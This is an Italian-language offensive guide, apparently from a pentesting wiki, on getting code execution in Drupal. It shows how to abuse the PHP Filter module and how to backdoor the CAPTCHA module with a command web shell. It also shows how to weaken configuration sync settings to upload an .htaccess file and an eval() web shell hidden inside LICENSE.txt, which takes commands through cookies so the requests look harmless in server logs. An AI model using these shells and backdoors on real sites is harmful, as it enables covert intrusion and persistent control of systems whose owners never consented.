Drupal RCE

Con il modulo PHP Filter

È necessario che il plugin php sia installato (controlla accedendo a /modules/php e se restituisce un 403 allora, esiste, se non trovato, allora il plugin php non è installato)

Vai su Modules -> (Controlla) PHP Filter -> Salva configurazione

Poi clicca su Aggiungi contenuto -> Seleziona Pagina base o Articolo -> Scrivi php shellcode nel corpo -> Seleziona PHP code in Text format -> Seleziona Anteprima

Infine accedi semplicemente al nodo appena creato:

curl http://drupal-site.local/node/3

Installa il modulo PHP Filter

Dalla versione 8 in poi, il PHP Filter modulo non è installato di default. Per sfruttare questa funzionalità, dovremmo installare il modulo noi stessi.

1. Scarica l'ultima versione del modulo dal sito di Drupal.

2. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

3. Una volta scaricato, vai su Amministrazione > Report > Aggiornamenti disponibili.

4. Clicca su Sfoglia, seleziona il file dalla directory in cui lo abbiamo scaricato e poi clicca su Installa.

5. Una volta installato il modulo, possiamo cliccare su Contenuto e creare una nuova pagina base, simile a come abbiamo fatto nell'esempio di Drupal 7. Ancora una volta, assicurati di selezionare Codice PHP dal menu a discesa Formato testo.

Modulo con backdoor

Un modulo con backdoor può essere creato aggiungendo una shell a un modulo esistente. I moduli possono essere trovati sul sito drupal.org. Scegliamo un modulo come CAPTCHA. Scorri verso il basso e copia il link per l'archivio tar.gz archive.

• Scarica l'archivio ed estrai il suo contenuto.

wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz

• Crea un PHP web shell con i contenuti:

<?php
system($_GET["cmd"]);
?>

• Successivamente, dobbiamo creare un .htaccess file per darci accesso alla cartella. Questo è necessario poiché Drupal nega l'accesso diretto alla cartella /modules.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

• La configurazione sopra applicherà regole per la cartella / quando richiediamo un file in /modules. Copia entrambi questi file nella cartella captcha e crea un archivio.

mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/

• Assumendo di avere accesso amministrativo al sito web, clicca su Gestisci e poi su Estendi nella barra laterale. Successivamente, clicca sul pulsante + Installa nuovo modulo, e verremo portati alla pagina di installazione, come http://drupal-site.local/admin/modules/install. Naviga fino all'archivio del Captcha backdoored e clicca su Installa.

• Una volta completata l'installazione, naviga su /modules/captcha/shell.php per eseguire comandi.

Backdooring Drupal con sincronizzazione della configurazione

Post condiviso da Coiffeur0x90

Parte 1 (attivazione di Media e Libreria Media)

Nel menu Estendi (/admin/modules), puoi attivare quelli che sembrano essere plugin già installati. Per impostazione predefinita, i plugin Media e Libreria Media non sembrano essere attivati, quindi attiviamoli.

Prima dell'attivazione:

Dopo l'attivazione:

Parte 2 (sfruttare la funzionalità Sincronizzazione della configurazione)

Sfrutteremo la funzionalità Sincronizzazione della configurazione per scaricare (esportare) e caricare (importare) le voci di configurazione di Drupal:

• /admin/config/development/configuration/single/export

• /admin/config/development/configuration/single/import

Patch system.file.yml

Iniziamo patchando la prima voce allow_insecure_uploads da:

File: system.file.yml

...

allow_insecure_uploads: false

...

A:

File: system.file.yml

...

allow_insecure_uploads: true

...

Patch field.field.media.document.field_media_document.yml

Quindi, applica la patch alla seconda voce file_extensions da:

File: field.field.media.document.field_media_document.yml

...

file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'

...

A:

File: field.field.media.document.field_media_document.yml

...

file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'htaccess txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'

...

Non lo uso in questo post del blog, ma è importante notare che è possibile definire l'entry file_directory in modo arbitrario e che è vulnerabile a un attacco di path traversal (quindi possiamo risalire all'interno dell'albero del filesystem di Drupal).

Parte 3 (sfruttando la funzionalità Aggiungi Documento)

L'ultimo passaggio è il più semplice e si suddivide in due sotto-passaggi. Il primo è caricare un file in formato .htaccess per sfruttare le direttive di Apache e consentire ai file .txt di essere interpretati dal motore PHP. Il secondo è caricare un file .txt contenente il nostro payload.

File: .htaccess

<Files *>
SetHandler application/x-httpd-php
</Files>

# Vroum! Vroum!
# We reactivate PHP engines for all versions in order to be targetless.
<IfModule mod_php.c>
php_flag engine on
</IfModule>
<IfModule mod_php7.c>
php_flag engine on
</IfModule>
<IfModule mod_php5.c>
php_flag engine on
</IfModule>

Perché questo trucco è interessante?

Perché una volta che il Webshell (che chiameremo LICENSE.txt) è stato caricato sul server Web, possiamo trasmettere i nostri comandi tramite $_COOKIE e nei log del server Web, questo apparirà come una legittima richiesta GET a un file di testo.

Perché chiamare il nostro Webshell LICENSE.txt?

Semplicemente perché se prendiamo il seguente file, ad esempio core/LICENSE.txt (che è già presente nel core di Drupal), abbiamo un file di 339 righe e 17,6 KB di dimensione, che è perfetto per aggiungere un piccolo frammento di codice PHP nel mezzo (dato che il file è abbastanza grande).

File: Patched LICENSE.txt

...

this License, you may choose any version ever published by the Free Software
Foundation.

<?php

# We inject our payload into the cookies so that in the logs of the compromised
# server it shows up as having been requested via the GET method, in order to
# avoid raising suspicions.
if (isset($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
if (!empty($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
eval($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"]);
} else {
phpinfo();
}
}

?>

10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author

...

Parte 3.1 (carica file .htaccess)

Per prima cosa, sfruttiamo la funzione Aggiungi Documento (/media/add/document) per caricare il nostro file contenente le direttive Apache (.htaccess).

Parte 3.2 (carica file LICENSE.txt)

Poi, sfruttiamo di nuovo la funzione Aggiungi Documento (/media/add/document) per caricare un Webshell nascosto all'interno di un file di licenza.

Parte 4 (interazione con il Webshell)

L'ultima parte consiste nell'interagire con il Webshell.

Come mostrato nello screenshot seguente, se il cookie previsto dal nostro Webshell non è definito, otteniamo il risultato successivo quando consultiamo il file tramite un browser Web.

Quando l'attaccante imposta il cookie, può interagire con il Webshell ed eseguire qualsiasi comando desideri.

E come puoi vedere nei log, sembra che sia stato richiesto solo un file txt.

Grazie per aver dedicato del tempo a leggere questo articolo, spero che ti aiuti a ottenere alcune shell.